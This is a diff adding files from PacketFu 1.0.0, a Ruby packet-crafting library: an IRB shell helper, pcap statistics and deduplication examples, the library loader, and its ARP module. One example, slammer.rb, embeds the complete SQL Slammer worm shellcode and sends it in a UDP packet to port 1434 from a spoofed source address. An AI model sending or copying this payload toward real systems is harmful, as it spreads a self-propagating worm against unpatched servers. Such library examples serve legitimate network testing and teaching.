packetfu 1.0.0

data/examples/packetfu-shell.rb

@@ -0,0 +1,111 @@
+# == Synopsis
+#
+# packetfu-shell.rb is intended for IRB consumption, and providing an
+# interactive interface for PacketFu experimentation.
+#
+# == Usage
+#
+#   irb -r packetfu-shell.rb
+# or
+#   sudo irb -r packetfu-shell.rb
+#
+# If run as root, packet capturing/injecting is available, which includes
+# access to Utils.whoami?
+#
+# Once loaded, the PacketFu module is mixed in, and Utils commands are
+# aliased to the PacketFu module proper. Sessions look something like
+# this:
+#
+# == Example
+#
+#  irb(main):001:0> pkt = TCPPacket.new
+#  => 00 1a c5 00 00 00 00 1a c5 00 00 00 08 00 45 00   ..............E.
+#  00 28 62 9d 00 00 ff 06 59 33 00 00 00 00 00 00   .(b.....Y3......
+#  00 00 d4 fb 00 00 18 c6 32 86 00 00 00 00 50 00   ........2.....P.
+#  40 00 4f 9d 00 00                                 @.O...
+#  irb(main):002:0> pkt.payload="I am totally up in your stack, twiddling your bits."
+#  => "I am totally up in your stack, twiddling your bits."
+#  irb(main):003:0> pkt.ip_saddr="1.2.3.4"
+#  => "1.2.3.4"
+#  irb(main):004:0> pkt.tcp_sport=13013
+#  => 13013
+#  irb(main):005:0> pkt.tcp_dport=808
+#  => 808
+#  irb(main):006:0> pkt.recalc
+#  => {"eth_src"=>{"oui"=>{"local"=>0, "oui"=>6853, "b0"=>0, "b1"=>0, "b2"=>0, "multicast"=>0, "b3"=>0, "b4"=>0, "b5"=>0}, "nic"=>{"n1"=>0, "n2"=>0, "n3"=>0}}, "body"=>{"ip_tos"=>0, "ip_src"=>{"o1"=>1, "o2"=>2, "o3"=>3, "o4"=>4}, "body"=>{"tcp_ecn"=>{"c"=>0, "n"=>0, "e"=>0}, "tcp_dst"=>808, "tcp_win"=>16384, "body"=>"I am totally up in your stack, twiddling your bits.", "tcp_flags"=>{"fin"=>0, "psh"=>0, "syn"=>0, "rst"=>0, "ack"=>0, "urg"=>0}, "tcp_hlen"=>5, "tcp_ack"=>0, "tcp_urg"=>0, "tcp_seq"=>415642246, "tcp_sum"=>51184, "tcp_reserved"=>0, "tcp_opts"=>"", "tcp_src"=>13013}, "ip_dst"=>{"o1"=>0, "o2"=>0, "o3"=>0, "o4"=>0}, "ip_frag"=>0, "ip_proto"=>6, "ip_hl"=>5, "ip_len"=>91, "ip_sum"=>21754, "ip_id"=>25245, "ip_v"=>4, "ip_ttl"=>255}, "eth_proto"=>2048, "eth_dst"=>{"oui"=>{"local"=>0, "oui"=>6853, "b0"=>0, "b1"=>0, "b2"=>0, "multicast"=>0, "b3"=>0, "b4"=>0, "b5"=>0}, "nic"=>{"n1"=>0, "n2"=>0, "n3"=>0}}}
+#  irb(main):007:0> pkt.to_f('/tmp/tcp-example.pcap')
+#  => ["/tmp/tcp-example.pcap", 145, 1, 1220048597, 1]
+#  irb(main):008:0> puts pkt.inspect_hex(2)
+#  32 d5 03 28 7c 50 1f 01 00 00 00 00 50 00 40 00   2..(|P......P.@.
+#  77 eb 00 00 49 20 61 6d 20 74 6f 74 61 6c 6c 79   w...I am totally
+#  20 75 70 20 69 6e 20 79 6f 75 72 20 73 74 61 63    up in your stac
+#  6b 2c 20 74 77 69 64 64 6c 69 6e 67 20 79 6f 75   k, twiddling you
+#  72 20 62 69 74 73 2e                              r bits.
+#  => nil
+
+require 'examples'
+require 'packetfu'
+
+module PacketFu
+	def whoami?(args={})
+		Utils.whoami?(args)
+	end
+	def arp(arg)
+		Utils.arp(arg)
+	end
+end
+
+include PacketFu
+
+# Draws a picture. Includes a nunchuck, so you know that it's serious.
+# I /think/ this is how you're supposed to spell it in a kana charset.
+# http://jisho.org/words?jap=+%E3%83%91%E3%82%B1%E3%83%83%E3%83%88%E3%83%95&eng=&dict=edict
+#
+def packetfu_ascii_art
+	puts <<EOM
+ _______  _______  _______  _        _______ _________ _______          
+(  ____ )(  ___  )(  ____ \\| \\    /\\(  ____ \\\\__   __/(  ____ \\|\\     /|
+| (    )|| (   ) || (    \\/|  \\  / /| (    \\/   ) (   | (    \\/| )   ( |
+| (____)|| (___) || |      |  (_/ / | (__       | |   | (__    | |   | |
+|  _____)|  ___  || |      |   _ (  |  __)      | |   |  __)   | |   | |
+| (      | (   ) || |      |  ( \\ \\ | (         | |   | (      | |   | |
+| )      | )   ( || (____/\\|  /  \\ \\| (____/\\   | |   | )      | (___) |
+|/       |/     \\|(_______/|_/    \\/(_______/   )_(   |/       (_______)
+ ____________________________              ____________________________
+(                            )            (                            )
+| 01000001 00101101 01001000 )( )( )( )( )( 00101101 01000001 00100001 |
+|                            )( )( )( )( )(                            |
+(____________________________)            (____________________________)
+                               PacketFu
+             a mid-level packet manipulation library for ruby
+
+EOM
+	end
+
+# Displays a helpful banner.
+def banner
+	packetfu_ascii_art
+	puts ">>> PacketFu Shell #{PacketFu.version}."
+	if Process.euid.zero? && @@pcaprub_loaded 
+		puts ">>> Use $packetfu_default.config for salient networking details."
+		print "IP:  %-15s Mac: %s" % [$packetfu_default.ip_saddr, $packetfu_default.eth_saddr]
+		puts "   Gateway: %s" % $packetfu_default.eth_daddr
+		print "Net: %-15s" % [Pcap.lookupnet($packetfu_default.iface)][0]
+		print "  " * 13 
+		puts "Iface:   %s" % [($packetfu_default.iface)]
+		puts ">>> Packet capturing/injecting enabled."
+	else
+		print ">>> Packet capturing/injecting disabled. "
+		puts Process.euid.zero? ? "(no PcapRub)" : "(not root)"
+	end
+	puts "<>" * 36
+end
+
+# Silly wlan0 workaround
+begin
+	$packetfu_default = PacketFu::Config.new(Utils.whoami?) if(@@pcaprub_loaded && Process.euid.zero?)
+rescue RuntimeError
+	$packetfu_default = PacketFu::Config.new(Utils.whoami?(:iface => 'wlan0')) if(@@pcaprub_loaded && Process.euid.zero?)
+end
+
+banner

data/examples/simple-stats.rb

@@ -0,0 +1,42 @@
+#!/usr/bin/env ruby
+
+# Simple-stats.rb takes a pcap file, and gives some simple 
+# stastics on the protocols found. It's mainly used to
+# demonstrate a method to parse pcap files.
+
+require 'examples' # For path setting slight-of-hand
+require 'packetfu'
+
+# Takes a file name, parses the packets, and records the packet
+# type based on its PacketFu class.
+def count_packet_types(file)
+	file = File.open(file) {|f| f.read}
+	stats = {}
+	pcapfile = PacketFu::PcapPackets.new
+	pcapfile.read(file)
+	pcapfile.each do |p|
+		# Now it's a PacketFu packet struct.
+		pkt = PacketFu::Packet.parse(p.data) 
+		kind = pkt.class.to_s.split("::").last
+		if stats[kind]
+			stats[kind] += 1
+		else
+			stats[kind] = 0
+		end
+	end
+	stats.each_pair { |k,v| puts "%-12s: %4d" % [k,v] }
+end
+
+if File.readable?(infile = (ARGV[0] || 'in.pcap'))
+	title = "Packets by packet type in '#{infile}'"
+	puts title
+	puts "-" * title.size
+	count_packet_types(infile)
+else
+	raise RuntimeError, "Need an infile, like so: #{$0} in.pcap"
+end
+
+
+
+
+

data/examples/slammer.rb

@@ -0,0 +1,33 @@
+#!/usr/bin/env ruby
+
+# Fires off a slammer packet to an unsuspecting target. This code does not
+# break real devices! (To do that, you'll need to fix up the targetting)
+target = ARGV[0]
+raise RuntimeError, "Need a target" unless target
+action = ARGV[1]
+raise RuntimeError, "Need an action. Try file or your interface." unless action
+
+require 'packetfu'
+include PacketFu
+
+slammer = "\004\001\001\001\001\001\001" + "\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001" + "\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001" + "\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001" + "\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\001\334\311\260B\353\016" + "\001\001\001\001\001\001\001p\256B\001p\256B\220\220\220\220\220\220\220\220h\334\311\260B\270\001\001" + "\001\0011\311\261\030P\342\3755\001\001\001\005P\211\345Qh.dllhel32hkernQhounthickChGetTf" + "\271llQh32.dhws2_f\271etQhsockf\271toQhsend\276\030\020\256B\215E\324P\377\026P\215E\340P\215E\360P\377" + "\026P\276\020\020\256B\213\036\213\003=U\213\354Qt\005\276\034\020\256B\377\026\377\3201\311QQP\201\361" + "\003\001\004\233\201\361\001\001\001\001Q\215E\314P\213E\300P\377\026j\021j\002j\002\377\320P\215E\304P" + "\213E\300P\377\026\211\306\t\333\201\363<a\331\377\213E\264\215\f@\215\024\210\301\342\004\001\302\301" + "\342\b)\302\215\004\220\001\330\211E\264j\020\215E\260P1\311Qf\201\361x\001Q\215E\003P\213E\254P\377\326" + "\353\312"
+
+def rand_source_ip
+	[rand(0xffffffff)].pack("N")
+end
+
+kill_packet = UDPPacket.new
+kill_packet.eth_daddr = "00:1b:63:aa:bb:cc"
+kill_packet.ip_daddr =  ARGV[0]
+kill_packet.ip_src.read(rand_source_ip)
+kill_packet.udp_dst = 1434
+kill_packet.recalc
+kill_packet.payload = slammer
+
+if action == 'file'.downcase
+	puts kill_packet.to_f
+else
+	puts kill_packet.to_w(action.downcase)
+end
+
+

data/examples/uniqpcap.rb

@@ -0,0 +1,15 @@
+# Uniqpcap.rb takes a pcap file, strips out duplicate packets, and 
+# writes them to a file.
+#
+# The duplicate pcap problem is common when I'm capturing 
+# traffic to/from a VMWare image, for some reason.
+#
+# Currently, the timestamp information is lost due to PcapRub's 
+# file read. For me, this isn't a big deal. Future versions 
+# will deal with timestamps correctly.
+require 'examples' # For path setting slight-of-hand
+require 'packetfu'
+
+in_array = PacketFu::Read.f2a(:file => ARGV[0])
+puts PacketFu::Write.a2f(:file => "uniq-" + ARGV[0], :arr => in_array.uniq).inspect
+

data/lib/packetfu.rb

@@ -0,0 +1,108 @@
+
+# :title: PacketFu Documentation
+# :include: ../README
+# :include: ../INSTALL
+# :include: ../LICENSE
+
+$: << File.expand_path(File.dirname(__FILE__))
+require "packetfu/structfu"
+require "ipaddr"
+require 'rubygems' if RUBY_VERSION =~ /^1\.[0-8]/
+
+module PacketFu
+
+	# Sets the expected byte order for a pcap file. See PacketFu::Read.set_byte_order
+	@byte_order = :little
+
+	# Checks if pcaprub is loaded correctly.
+	@@pcaprub_loaded = false
+	
+	# PacketFu works best with Pcaprub version 0.8-dev (at least)
+	# The current (Aug 01, 2010) pcaprub gem is 0.9, so should be fine.
+  def self.pcaprub_platform_require
+		begin
+			require 'pcaprub'
+		rescue LoadError
+			return false
+		end
+      @@pcaprub_loaded = true 
+  end
+
+	pcaprub_platform_require
+	if @@pcaprub_loaded
+		if Pcap.version !~ /[0-9]\.[7-9][0-9]?(-dev)?/ # Regex for 0.7-dev and beyond.
+			@@pcaprub_loaded = false # Don't bother with broken versions
+			raise LoadError, "PcapRub not at a minimum version of 0.8-dev"
+		end
+		require "packetfu/capture" 
+		require "packetfu/inject"
+	else
+		warn "Warning: Missing pcaprub, cannot load PacketFu::Capture or PacketFu::Inject"
+	end
+
+end
+
+require "packetfu/pcap"
+require "packetfu/packet"
+require "packetfu/invalid"
+require "packetfu/eth"
+require "packetfu/ip" 
+require "packetfu/arp"
+require "packetfu/icmp"
+require "packetfu/udp"
+require "packetfu/tcp"
+require "packetfu/ipv6" # This is pretty minimal.
+require "packetfu/utils"
+require "packetfu/config"
+
+module PacketFu
+
+VERSION = "1.0.0" # Version 1.0.0 was released July 31, 2010
+
+	# Returns the current version of PacketFu. Incremented every once 
+	# in a while, when I remember
+	def self.version
+		PacketFu::VERSION
+	end
+
+	# Returns the version in a binary format for easy comparisons.
+	def self.binarize_version(str)
+		if(str.respond_to?(:split) && str =~ /^[0-9]+(\.([0-9]+)(\.[0-9]+)?)?$/)
+			bin_major,bin_minor,bin_teeny = str.split(/\x2e/).map {|x| x.to_i}
+			bin_version = (bin_major.to_i << 16) + (bin_minor.to_i << 8) + bin_teeny.to_i
+		else
+			raise ArgumentError, "Compare version malformed. Should be \x22x.y.z\x22"
+		end
+	end
+
+	# Returns true if the version is equal to or greater than the compare version.
+	# If the current version of PacketFu is "0.3.1" for example:
+	#
+	#   PacketFu.at_least? "0"     # => true 
+	#   PacketFu.at_least? "0.2.9" # => true 
+	#   PacketFu.at_least? "0.3"   # => true 
+	#   PacketFu.at_least? "1"     # => true after 1.0's release
+	#   PacketFu.at_least? "1.12"  # => false
+	#   PacketFu.at_least? "2"     # => false 
+	def self.at_least?(str)
+		this_version = binarize_version(self.version)
+		ask_version = binarize_version(str)
+		this_version >= ask_version
+	end
+
+	# Returns true if the current version is older than the compare version.
+	def self.older_than?(str)
+		this_version = binarize_version(self.version)
+		ask_version = binarize_version(str)
+		this_version < ask_version
+	end
+
+	# Returns true if the current version is newer than the compare version.
+	def self.newer_than?(str)
+		return false if str == self.version
+		!self.older_than?(str)
+	end
+
+end
+
+# vim: nowrap sw=2 sts=0 ts=2 ff=unix ft=ruby

data/lib/packetfu/arp.rb

@@ -0,0 +1,239 @@
+module PacketFu
+
+	# ARPHeader is a complete ARP struct, used in ARPPacket. 
+	#
+	# ARP is used to discover the machine address of nearby devices.
+	#
+	# See http://www.networksorcery.com/enp/protocol/arp.htm for details.
+	#
+	# ==== Header Definition
+	#
+	#	 Int16   :arp_hw          Default: 1       # Ethernet
+	#	 Int16   :arp_proto,      Default: 0x8000  # IP
+	#	 Int8    :arp_hw_len,     Default: 6
+	#	 Int8    :arp_proto_len,  Default: 4
+	#	 Int16   :arp_opcode,     Default: 1       # 1: Request, 2: Reply, 3: Request-Reverse, 4: Reply-Reverse
+	#	 EthMac  :arp_src_mac                      # From eth.rb
+	#	 Octets  :arp_src_ip                       # From ip.rb
+	#	 EthMac  :arp_dst_mac                      # From eth.rb
+	#	 Octets  :arp_dst_ip                       # From ip.rb
+	#	 String  :body
+	class ARPHeader < Struct.new(:arp_hw, :arp_proto, :arp_hw_len,
+															 :arp_proto_len, :arp_opcode,
+															 :arp_src_mac, :arp_src_ip,
+															 :arp_dst_mac, :arp_dst_ip,
+															 :body)
+		include StructFu
+
+		def initialize(args={})
+			super( 
+				Int16.new(args[:arp_hw] || 1), 
+				Int16.new(args[:arp_proto] ||0x0800),
+				Int8.new(args[:arp_hw_len] || 6), 
+				Int8.new(args[:arp_proto_len] || 4), 
+				Int16.new(args[:arp_opcode] || 1),
+				EthMac.new.read(args[:arp_src_mac]),
+				Octets.new.read(args[:arp_src_ip]), 
+				EthMac.new.read(args[:arp_dst_mac]),
+				Octets.new.read(args[:arp_dst_ip]),
+				StructFu::String.new.read(args[:body])
+			)
+		end
+
+		# Returns the object in string form.
+		def to_s
+			self.to_a.map {|x| x.to_s}.join
+		end
+
+		# Reads a string to populate the object.
+		def read(str)
+			force_binary(str)
+			return self if str.nil?
+			self[:arp_hw].read(str[0,2])
+			self[:arp_proto].read(str[2,2])
+			self[:arp_hw_len].read(str[4,1])
+			self[:arp_proto_len].read(str[5,1])
+			self[:arp_opcode].read(str[6,2])
+			self[:arp_src_mac].read(str[8,6])
+			self[:arp_src_ip].read(str[14,4])
+			self[:arp_dst_mac].read(str[18,6])
+			self[:arp_dst_ip].read(str[24,4])
+			self[:body].read(str[28,str.size])
+			self
+		end
+
+		# Setter for the ARP hardware type.
+		def arp_hw=(i); typecast i; end
+		# Getter for the ARP hardware type.
+		def arp_hw; self[:arp_hw].to_i; end
+		# Setter for the ARP protocol.
+		def arp_proto=(i); typecast i; end
+		# Getter for the ARP protocol.
+		def arp_proto; self[:arp_proto].to_i; end
+		# Setter for the ARP hardware type length.
+		def arp_hw_len=(i); typecast i; end
+		# Getter for the ARP hardware type length.
+		def arp_hw_len; self[:arp_hw_len].to_i; end
+		# Setter for the ARP protocol length.
+		def arp_proto_len=(i); typecast i; end
+		# Getter for the ARP protocol length.
+		def arp_proto; self[:arp_proto].to_i; end
+		# Setter for the ARP opcode. 
+		def arp_opcode=(i); typecast i; end
+		# Getter for the ARP opcode. 
+		def arp_opcode; self[:arp_opcode].to_i; end
+		# Setter for the ARP source MAC address.
+		def arp_src_mac=(i); typecast i; end
+		# Getter for the ARP source MAC address.
+		def arp_src_mac; self[:arp_src_mac].to_s; end
+		# Getter for the ARP source IP address.
+		def arp_src_ip=(i); typecast i; end
+		# Setter for the ARP source IP address.
+		def arp_src_ip; self[:arp_src_ip].to_s; end
+		# Setter for the ARP destination MAC address.
+		def arp_dst_mac=(i); typecast i; end
+		# Setter for the ARP destination MAC address.
+		def arp_dst_mac; self[:arp_dst_mac].to_s; end
+		# Setter for the ARP destination IP address.
+		def arp_dst_ip=(i); typecast i; end
+		# Getter for the ARP destination IP address.
+		def arp_dst_ip; self[:arp_dst_ip].to_s; end
+
+		# Set the source MAC address in a more readable way.
+		def arp_saddr_mac=(mac)
+			mac = EthHeader.mac2str(mac)
+			self[:arp_src_mac].read(mac)
+			self.arp_src_mac
+		end
+
+		# Get a more readable source MAC address.
+		def arp_saddr_mac
+			EthHeader.str2mac(self[:arp_src_mac].to_s)
+		end
+
+		# Set the destination MAC address in a more readable way.
+		def arp_daddr_mac=(mac)
+			mac = EthHeader.mac2str(mac)
+			self[:arp_dst_mac].read(mac)
+			self.arp_dst_mac
+		end
+
+		# Get a more readable source MAC address.
+		def arp_daddr_mac
+			EthHeader.str2mac(self[:arp_dst_mac].to_s)
+		end
+
+		# Set a more readable source IP address. 
+		def arp_saddr_ip=(addr)
+			self[:arp_src_ip].read_quad(addr)
+		end
+
+		# Get a more readable source IP address. 
+		def arp_saddr_ip
+			self[:arp_src_ip].to_x
+		end
+
+		# Set a more readable destination IP address.
+		def arp_daddr_ip=(addr)
+			self[:arp_dst_ip].read_quad(addr)
+		end
+		
+		# Get a more readable destination IP address.
+		def arp_daddr_ip
+			self[:arp_dst_ip].to_x
+		end
+
+	end # class ARPHeader
+
+	# ARPPacket is used to construct ARP packets. They contain an EthHeader and an ARPHeader.
+	# == Example
+	#
+  #  require 'packetfu'
+	#  arp_pkt = PacketFu::ARPPacket.new(:flavor => "Windows")
+	#  arp_pkt.arp_saddr_mac="00:1c:23:44:55:66"  # Your hardware address
+	#  arp_pkt.arp_saddr_ip="10.10.10.17"  # Your IP address
+	#  arp_pkt.arp_daddr_ip="10.10.10.1"  # Target IP address
+	#  arp_pkt.arp_opcode=1  # Request
+	# 
+	#  arp_pkt.to_w('eth0')	# Inject on the wire. (requires root)
+  #  arp_pkt.to_f('/tmp/arp.pcap') # Write to a file.
+	#
+	# == Parameters
+	#
+	#  :flavor
+	#   Sets the "flavor" of the ARP packet. Choices are currently:
+	#     :windows, :linux, :hp_deskjet 
+	#  :eth
+	#   A pre-generated EthHeader object. If not specified, a new one will be created.
+	#  :arp
+	#   A pre-generated ARPHeader object. If not specificed, a new one will be created.
+	#  :config
+	#   A hash of return address details, often the output of Utils.whoami?
+	class ARPPacket < Packet
+
+		attr_accessor :eth_header, :arp_header
+
+		def initialize(args={})
+			@eth_header = EthHeader.new(args).read(args[:eth])
+			@arp_header = ARPHeader.new(args).read(args[:arp]) 
+			@eth_header.eth_proto = "\x08\x06"
+			@eth_header.body=@arp_header
+
+			# Please send more flavors to todb-packetfu@planb-security.net.
+			# Most of these initial fingerprints come from one (1) sample.
+			case (args[:flavor].nil?) ? :nil : args[:flavor].to_s.downcase.intern
+			when :windows; @arp_header.body = "\x00" * 64				# 64 bytes of padding 
+			when :linux; @arp_header.body = "\x00" * 4 +				# 32 bytes of padding 
+				"\x00\x07\x5c\x14" + "\x00" * 4 +
+				"\x00\x0f\x83\x34" + "\x00\x0f\x83\x74" +
+				"\x01\x11\x83\x78" + "\x00\x00\x00\x0c" + 
+				"\x00\x00\x00\x00"
+			when :hp_deskjet; 																	# Pads up to 60 bytes.
+				@arp_header.body = "\xe0\x90\x0d\x6c" + 
+				"\xff\xff\xee\xee" + "\x00" * 4 + 
+				"\xe0\x8f\xfa\x18\x00\x20"	
+			else; @arp_header.body = "\x00" * 18								# Pads up to 60 bytes.
+			end
+
+			@headers = [@eth_header, @arp_header]
+			super
+
+		end
+
+		# Generates summary data for ARP packets.
+		def peek(args={})
+			peek_data = ["A "]
+			peek_data << "%-5d" % self.to_s.size
+			peek_data << arp_saddr_mac
+			peek_data << "(#{arp_saddr_ip})"
+			peek_data << "->"
+			peek_data << case arp_daddr_mac
+										when "00:00:00:00:00:00"; "Bcast00"
+										when "ff:ff:ff:ff:ff:ff"; "BcastFF"
+										else; arp_daddr_mac
+										end
+			peek_data << "(#{arp_daddr_ip})"
+			peek_data << ":"
+			peek_data << case arp_opcode
+										when 1; "Requ"
+										when 2; "Repl"
+										when 3; "RReq"
+										when 4; "RRpl"
+										when 5; "IReq"
+										when 6; "IRpl"
+										else; "0x%02x" % arp_opcode
+										end
+			peek_data.join
+		end
+
+		# While there are lengths in ARPPackets, there's not
+		# much to do with them.
+		def recalc(args={})
+			@headers[0].inspect
+		end
+
+	end
+
+end
+
+# vim: nowrap sw=2 sts=0 ts=2 ff=unix ft=ruby